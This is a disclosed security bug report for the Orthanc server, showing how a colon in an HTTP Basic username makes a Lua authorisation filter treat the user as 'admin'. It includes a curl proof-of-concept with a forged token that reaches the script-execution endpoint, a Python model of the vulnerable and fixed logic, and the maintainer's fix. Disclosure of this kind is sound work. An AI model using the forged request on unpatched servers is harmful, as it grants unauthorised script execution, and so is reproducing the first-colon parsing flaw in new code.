**Details**

Users can impersonate other users when HTTP basic authentication + authorisation filters are in use, and if they can control their own username. This is due to colons being allowed in HTTP basic usernames, which should be forbidden according to the spec. The first colon in the "user:pass" string is used to separate out the username, so if a username is for example "admin:user1" then authorisation filters will see the user as "admin". This does require convincing an admin to add a suspicious username to the config, so exploitation may be unlikely.

**What steps will reproduce the problem?**

Config:

```json
{
  "Name" : "${ORTHANC_NAME} in Docker Compose",
  "RemoteAccessAllowed" : true,
  "ExecuteLuaEnabled": true,
  "RegisteredUsers" : {
    "admin": "admin",
    "admin:abc123": "password",
    "user1": "password1"
  }
}
```

Lua authorisation filter:

```lua
function IncomingHttpRequestFilter(method, uri, ip, username, httpHeaders)
  -- Only allow GET requests for non-admin users
  print("Lua filter: '" .. username .. "' -> '" .. uri .. "'")
  if method == 'GET' then
    return true
  elseif username == 'admin' then
    return true
  else
    return false
  end
end
```

After loading the auth filter, we can try to run a script while logged in as "admin:abc123", returning a 200 response:

```
curl http://localhost:8042/tools/execute-script --data-binary @auth.lua -i -H 'Authorization: Basic YWRtaW46YWJjMTIzOnBhc3N3b3Jk'
```

The filter prints out the username "admin":

```
[orthanc] | W0923 01:12:26.883583 HTTP-8 LuaContext.cpp:95] Lua says: Lua filter: 'admin' -> '/tools/execute-script'
```

**What is the expected output? What do you see instead?**

The curl request returns a 200 response where it should return a 403. The Lua filter prints out the username "admin" instead of "admin:abc123".

**What version of the product are you using? On what operating system?**

Docker image jodogne/orthanc-plugins:1.12.9 on Linux.
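The following is an added example, not part of the report above and not Orthanc's code, that models the confusion in Python. The `RegisteredUsers` entries and the Basic token are taken from the report; the way the pre-fix server is modelled (credentials accepted when the whole token equals base64("user:pass") for some registered user, while the username handed to the filter is recovered by splitting the decoded string at its first colon) is an assumption made for illustration. It shows both extraction strategies side by side and the RFC 7617 check that would have rejected the suspicious username at configuration time.

```python
"""Model of the colon-in-username confusion (constructed example, not Orthanc code)."""
import base64
import hmac

# Copied from the report's config (constructed test data).
REGISTERED_USERS = {
    "admin": "admin",
    "admin:abc123": "password",
    "user1": "password1",
}


def basic_token(username, password):
    """Return the value that follows 'Basic ' in an Authorization header."""
    return base64.b64encode(f"{username}:{password}".encode()).decode()


def authenticate(token, users):
    """Credential check modelled as a whole-token comparison (assumption about the
    pre-fix server). The token is accepted if it equals base64("user:pass") for any
    registered user. Only a yes/no answer is produced; no username is derived here."""
    ok = False
    for user, pw in users.items():
        # Constant-time compare, evaluated for every entry so timing is uniform.
        if hmac.compare_digest(token.encode(), basic_token(user, pw).encode()):
            ok = True
    return ok


def username_vulnerable(token, users):
    """Pre-fix extraction: split the decoded credentials at the FIRST colon.
    For 'admin:abc123:password' this yields 'admin'. `users` is unused here."""
    decoded = base64.b64decode(token).decode()
    return decoded.split(":", 1)[0]


def username_fixed(token, users):
    """Hardened extraction: the username is the registered entry whose whole
    encoded credential matches the token, so an embedded colon cannot move the
    split point. Returns None when nothing matches."""
    for user, pw in users.items():
        if hmac.compare_digest(token.encode(), basic_token(user, pw).encode()):
            return user
    return None


def validate_username(username):
    """RFC 7617 forbids a colon in the user-id; a config loader should reject
    such entries up front instead of relying on the lookup above."""
    return ":" not in username


def incoming_http_request_filter(method, username):
    """Python equivalent of the Lua filter from the report: non-admin users may
    only issue GET requests."""
    if method == "GET":
        return True
    return username == "admin"


def handle(method, uri, token, users, extract):
    """Authenticate, recover the username with `extract`, run the filter.
    Returns the HTTP status code the request would get."""
    if not authenticate(token, users):
        return 401
    username = extract(token, users)
    if username is None:
        return 401
    return 200 if incoming_http_request_filter(method, username) else 403


if __name__ == "__main__":
    # Token from the report: base64("admin:abc123:password")
    token = "YWRtaW46YWJjMTIzOnBhc3N3b3Jk"
    assert token == basic_token("admin:abc123", "password")
    req = ("POST", "/tools/execute-script", token, REGISTERED_USERS)
    print("pre-fix status:", handle(*req, username_vulnerable))   # 200
    print("fixed status:  ", handle(*req, username_fixed))        # 403
    print("invalid names: ", [u for u in REGISTERED_USERS if not validate_username(u)])
```

With the first-colon split, the forged token authenticates as the registered user "admin:abc123" but the filter is told the caller is "admin", so the POST passes. Deriving the username from the registered entry that actually matched closes the gap, and rejecting colons at configuration time removes the ambiguity altogether.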
Thanks for the report. It is fixed by the following changeset: https://orthanc.uclouvain.be/hg/orthanc/rev/9e5bb00c0525